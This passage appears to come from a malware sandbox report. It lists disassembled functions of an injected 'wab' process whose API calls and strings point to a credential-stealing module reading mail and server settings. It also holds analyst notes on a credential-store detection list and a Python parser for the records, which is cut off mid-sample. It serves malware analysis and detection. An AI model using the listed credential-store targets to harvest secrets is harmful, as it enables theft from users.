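Run against the full listing (paste the page text into SAMPLE or read it from a file) the helper reports the three credential-store blocks and stays silent on the GDI/USER32 drawing functions, which is the point: on a report of this size the API ID and String ID lines are the cheapest place to separate the stealer module from the host application's UI code. Extend CRED_STORE_STRINGS with other stores you expect to see (browser profile paths, mail client registry keys) rather than loosening the API match.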
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              APIs
                                                              • memset.MSVCRT ref: 004092C0
                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • _mbscpy.MSVCRT ref: 004092FC
                                                              Strings
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscpymemset
                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                              • API String ID: 408644273-3424043681
                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              APIs
                                                              Strings
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 1593657333-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                              • memcmp.MSVCRT ref: 00406672
                                                              • memcpy.MSVCRT ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              APIs
                                                              Strings
                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _msizerealloc
                                                              • String ID: failed memory resize %u to %u bytes
                                                              • API String ID: 2713192863-2134078882
                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                              APIs
                                                              • _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
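The records above are the Joe Sandbox IDA-plugin function listing for the wab snapshot (hcaresult_18_2_400000_wab.jbxd): per function, its direct API calls and subcalls, referenced strings, the memory dump it was lifted from, and the Similarity identifiers (API ID, String ID, API String ID, Opcode ID) the sandbox uses to match functions across snapshots. As an added example, not code from the report or from Joe Sandbox, here is a parser that turns such records into dictionaries so the Opcode IDs and referenced strings can be pivoted across dumps or samples. The sample input is constructed from three of the entries above; the layout the parser assumes (a record starts at each "APIs" header, String ID values joined with "$") is taken from those entries and is an assumption about the export format.

```python
import re
from typing import Dict, List

# Section headers the Joe Sandbox IDA plugin emits for every function record (assumed from the listing).
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
API_RE = re.compile(r"^(?P<name>[^.(]+)\.(?P<module>\w+)(?P<args>\(.*\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")

# Constructed sample: three records copied from the wab listing above.
SAMPLE = """\
APIs
Strings
• failed memory resize %u to %u bytes, xrefs: 00411706
Memory Dump Source
• Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wab.jbxd
Similarity
• API ID: _msizerealloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 2713192863-2134078882
• Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
APIs
• _mbscpy.MSVCRT ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
Strings
Memory Dump Source
• Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
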